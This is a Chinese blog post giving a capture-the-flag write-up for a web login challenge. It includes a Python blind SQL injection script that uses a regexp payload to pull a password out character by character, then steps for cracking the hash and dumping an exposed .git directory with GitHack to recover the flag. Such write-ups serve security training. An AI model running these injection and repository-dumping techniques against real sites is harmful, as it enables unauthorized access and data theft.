登陆

  • 进入页面登陆
  • 输入东西都没有
  • 直接给burpsuite看看


    图片.png
  • 有个盲注,此处测试mid left都不行,只有regexp行
  • 用脚本进行盲注
# py2.7
import string
import requests


u =  'http://c6065149f0634125968c0ed3421e96e17e45f13aa4af4331.changame.ichunqiu.com/Challenges/login.php'
headers = {
    'Content-Type': 'application/x-www-form-urlencoded'
}

payloads = string.letters + string.digits

temp = ''

for i in xrange(32):
    for p in payloads:
        payload = temp + p
        data = "username=aa'or p3ss_w0rd regexp '^{}'%23&password=admin".format(payload)
        r = requests.post(u,headers=headers,data=data)
        if(len(r.text.encode('utf-8')) == 12):
                temp += p
                print temp.ljust(32,'.')
                break
  • p3ss_w0rd是刚开始页面里面源码弄的,什么思路我也不懂。。
  • 得到账号是bctf3dm1n,密码是个md5,解密要收费,是adminqwe123666
  • 然后登陆进去后给出个目录列表
  • 仔细看那个名字.bctfg1t,应该是bctf的git。git泄露哦
  • 用githack,不是老版的githack,而是https://github.com/BugScanTeam/GitHack,能找到历史版本
  • 运行得到git目录。然后进去git cat-file -p HEAD(历史纪录),例如
    git cat -file - p a1/7d89c6219a1bcca6cb3b40526cc5b9da715a6e 去掉/号
  • 多试试可以得到一个php目录,然后访问得到flag。
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 2017-09-20 很是想念女儿,思念就像野草一样疯长。最近跟女儿微信视频也是有一搭没一搭爱理不理地...
    南星半夏生活记阅读 3,118评论 0 1
  • 每个人都擅长变脸 每个人都有些假面 什么展示给我少有的真诚 除了四季变换,风雨雷电 如果可以 我要站在三江之源,大...
    敖汤阅读 1,612评论 0 3
  • 喜欢这位画家的风格,现在的临摹只有那几朵花算是比较到位,其它的就差强人意了。 白色的花朵比较难以表现,要用其它的颜...
    平凡的我和我阅读 2,707评论 0 7
  • 世界给了他最丑陋的外表 一个被所有人看不起的钟楼怪人 给了他心爱的姑娘却只能让两具尸骨抱在一起永世长眠 终究连钟楼...
    十一_89c9阅读 1,839评论 0 1